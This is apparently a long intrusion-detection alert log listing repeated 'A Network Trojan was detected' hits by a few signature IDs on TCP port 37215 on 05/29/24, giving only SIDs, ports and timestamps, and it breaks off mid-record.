                SID:2829579
                Source Port:35276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771206
                SID:2829579
                Source Port:40946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361751
                SID:2829579
                Source Port:50400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788214
                SID:2829579
                Source Port:43058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226046
                SID:2829579
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422153
                SID:2835222
                Source Port:55510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022843
                SID:2829579
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369322
                SID:2835222
                Source Port:39184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620194
                SID:2835222
                Source Port:38160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617362
                SID:2829579
                Source Port:34294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681961
                SID:2829579
                Source Port:33850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962364
                SID:2829579
                Source Port:49734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653034
                SID:2835222
                Source Port:46068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966541
                SID:2829579
                Source Port:58018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166853
                SID:2835222
                Source Port:41018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075371
                SID:2829579
                Source Port:35480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869574
                SID:2835222
                Source Port:36018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240045
                SID:2829579
                Source Port:44446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890717
                SID:2829579
                Source Port:39936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427478
                SID:2835222
                Source Port:58796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257039
                SID:2829579
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559158
                SID:2829579
                Source Port:40214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499085
                SID:2829579
                Source Port:43088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209734
                SID:2835222
                Source Port:39872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029779
                SID:2829579
                Source Port:46118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035614
                SID:2835222
                Source Port:35392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177725
                SID:2835222
                Source Port:57474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227680
                SID:2835222
                Source Port:39212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858033
                SID:2829579
                Source Port:50486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779652
                SID:2835222
                Source Port:49172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521367
                SID:2835222
                Source Port:45734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968741
                SID:2829579
                Source Port:39046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.105045
                SID:2829579
                Source Port:45338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002167
                SID:2829579
                Source Port:51202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421411
                SID:2829579
                Source Port:48174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983149
                SID:2829579
                Source Port:44788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022172
                SID:2829579
                Source Port:46412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335860
                SID:2835222
                Source Port:58046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385327
                SID:2829579
                Source Port:55382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866440
                SID:2829579
                Source Port:53354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461914
                SID:2829579
                Source Port:60590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796236
                SID:2835222
                Source Port:54024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175569
                SID:2829579
                Source Port:44640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948054
                SID:2835222
                Source Port:37558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660011
                SID:2829579
                Source Port:57266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610072
                SID:2829579
                Source Port:43194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547526
                SID:2829579
                Source Port:43812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902960
                SID:2829579
                Source Port:46472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659542
                SID:2835222
                Source Port:42708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654050
                SID:2835222
                Source Port:57164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982977
                SID:2835222
                Source Port:60576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374535
                SID:2835222
                Source Port:57506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728252
                SID:2835222
                Source Port:44368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730286
                SID:2829579
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653002
                SID:2829579
                Source Port:50402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369572
                SID:2829579
                Source Port:49634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823985
                SID:2829579
                Source Port:50468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810949
                SID:2829579
                Source Port:53752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659869
                SID:2835222
                Source Port:35980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.738359
                SID:2829579
                Source Port:53554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526870
                SID:2829579
                Source Port:46908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855071
                SID:2835222
                Source Port:55280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870342
                SID:2829579
                Source Port:39894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984743
                SID:2835222
                Source Port:59626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552065
                SID:2835222
                Source Port:56600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684022
                SID:2835222
                Source Port:48746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339018
                SID:2835222
                Source Port:34340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374014
                SID:2835222
                Source Port:45286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966703
                SID:2835222
                Source Port:58326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816790
                SID:2835222
                Source Port:45192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432619
                SID:2835222
                Source Port:34704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141817
                SID:2835222
                Source Port:51738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912644
                SID:2829579
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339328
                SID:2829579
                Source Port:44252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.100072
                SID:2835222
                Source Port:45008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.256975
                SID:2835222
                Source Port:43168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361442
                SID:2829579
                Source Port:35256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322888
                SID:2829579
                Source Port:37110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897928
                SID:2835222
                Source Port:35410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763340
                SID:2829579
                Source Port:42520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361542
                SID:2835222
                Source Port:49746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835735
                SID:2835222
                Source Port:59892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572416
                SID:2829579
                Source Port:49738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767518
                SID:2829579
                Source Port:39498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519687
                SID:2829579
                Source Port:60904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926297
                SID:2829579
                Source Port:36436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622300
                SID:2829579
                Source Port:36644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981376
                SID:2835222
                Source Port:36834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169492
                SID:2829579
                Source Port:33354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847045
                SID:2829579
                Source Port:53382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227833
                SID:2835222
                Source Port:57842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210794
                SID:2829579
                Source Port:35686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958870
                SID:2829579
                Source Port:41316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669583
                SID:2829579
                Source Port:56524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360507
                SID:2835222
                Source Port:53040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.058633
                SID:2829579
                Source Port:59252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931511
                SID:2835222
                Source Port:49024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628963
                SID:2829579
                Source Port:44310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977643
                SID:2835222
                Source Port:50968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713986
                SID:2829579
                Source Port:42760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847274
                SID:2835222
                Source Port:50090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113479
                SID:2829579
                Source Port:48450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722129
                SID:2829579
                Source Port:47454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858223
                SID:2835222
                Source Port:54402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264653
                SID:2829579
                Source Port:52482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840890
                SID:2829579
                Source Port:35994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.368997
                SID:2829579
                Source Port:58442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100804
                SID:2829579
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468774
                SID:2835222
                Source Port:50878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732253
                SID:2835222
                Source Port:50024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833374
                SID:2835222
                Source Port:49086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281724
                SID:2829579
                Source Port:44408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779360
                SID:2829579
                Source Port:45900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:10.603438
                SID:2030490
                Source Port:38292
                Destination Port:1235
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655053
                SID:2835222
                Source Port:33930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231611
                SID:2835222
                Source Port:53530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420013
                SID:2829579
                Source Port:59412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988867
                SID:2829579
                Source Port:41112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728238
                SID:2835222
                Source Port:42756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688913
                SID:2835222
                Source Port:49370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.615005
                SID:2829579
                Source Port:51822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227020
                SID:2835222
                Source Port:55436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519885
                SID:2829579
                Source Port:60594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228164
                SID:2829579
                Source Port:38588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437855
                SID:2829579
                Source Port:60182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583376
                SID:2835222
                Source Port:57192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862176
                SID:2835222
                Source Port:54492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949646
                SID:2829579
                Source Port:51714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782567
                SID:2835222
                Source Port:37300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716330
                SID:2829579
                Source Port:54292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329458
                SID:2835222
                Source Port:33608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735385
                SID:2829579
                Source Port:41108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.459640
                SID:2835222
                Source Port:38948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.241678
                SID:2829579
                Source Port:37512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948885
                SID:2829579
                Source Port:36072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814898
                SID:2835222
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764399
                SID:2829579
                Source Port:35788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517776
                SID:2835222
                Source Port:46494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845182
                SID:2829579
                Source Port:39826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943597
                SID:2835222
                Source Port:38650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287044
                SID:2835222
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668041
                SID:2829579
                Source Port:50828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915007
                SID:2829579
                Source Port:38314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766813
                SID:2829579
                Source Port:43166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859585
                SID:2829579
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655690
                SID:2829579
                Source Port:56300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804811
                SID:2835222
                Source Port:42656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326408
                SID:2829579
                Source Port:34024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714004
                SID:2829579
                Source Port:47216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721881
                SID:2835222
                Source Port:44634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833033
                SID:2829579
                Source Port:36966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586120
                SID:2829579
                Source Port:38720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339113
                SID:2835222
                Source Port:49550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900477
                SID:2835222
                Source Port:44200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073691
                SID:2835222
                Source Port:39900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667743
                SID:2835222
                Source Port:51688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320489
                SID:2829579
                Source Port:36158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850214
                SID:2835222
                Source Port:39916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414106
                SID:2829579
                Source Port:35424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537068
                SID:2829579
                Source Port:43438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094980
                SID:2835222
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166901
                SID:2829579
                Source Port:33474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212284
                SID:2829579
                Source Port:54362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558208
                SID:2829579
                Source Port:51502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793612
                SID:2829579
                Source Port:55200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735833
                SID:2835222
                Source Port:51626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100998
                SID:2829579
                Source Port:46772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787385
                SID:2829579
                Source Port:44198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521764
                SID:2835222
                Source Port:53292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166853
                SID:2835222
                Source Port:42588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867498
                SID:2835222
                Source Port:38362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808525
                SID:2829579
                Source Port:48356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.812998
                SID:2829579
                Source Port:35144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160113
                SID:2829579
                Source Port:51630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435495
                SID:2829579
                Source Port:40730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330522
                SID:2829579
                Source Port:53060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855031
                SID:2829579
                Source Port:34318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900264
                SID:2829579
                Source Port:59878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447223
                SID:2829579
                Source Port:52432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.115472
                SID:2835222
                Source Port:42796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686368
                SID:2829579
                Source Port:33888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738477
                SID:2835222
                Source Port:34048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782506
                SID:2829579
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899473
                SID:2829579
                Source Port:48200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586739
                SID:2835222
                Source Port:54540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914637
                SID:2829579
                Source Port:36608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836821
                SID:2829579
                Source Port:56556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521670
                SID:2829579
                Source Port:37470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141761
                SID:2835222
                Source Port:33914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267036
                SID:2829579
                Source Port:60868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230354
                SID:2829579
                Source Port:59656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711909
                SID:2835222
                Source Port:48104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567733
                SID:2835222
                Source Port:56116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716294
                SID:2829579
                Source Port:55960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080515
                SID:2835222
                Source Port:59158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521800
                SID:2829579
                Source Port:46070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967642
                SID:2829579
                Source Port:43494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372210
                SID:2829579
                Source Port:39990
                Destination Port:37215
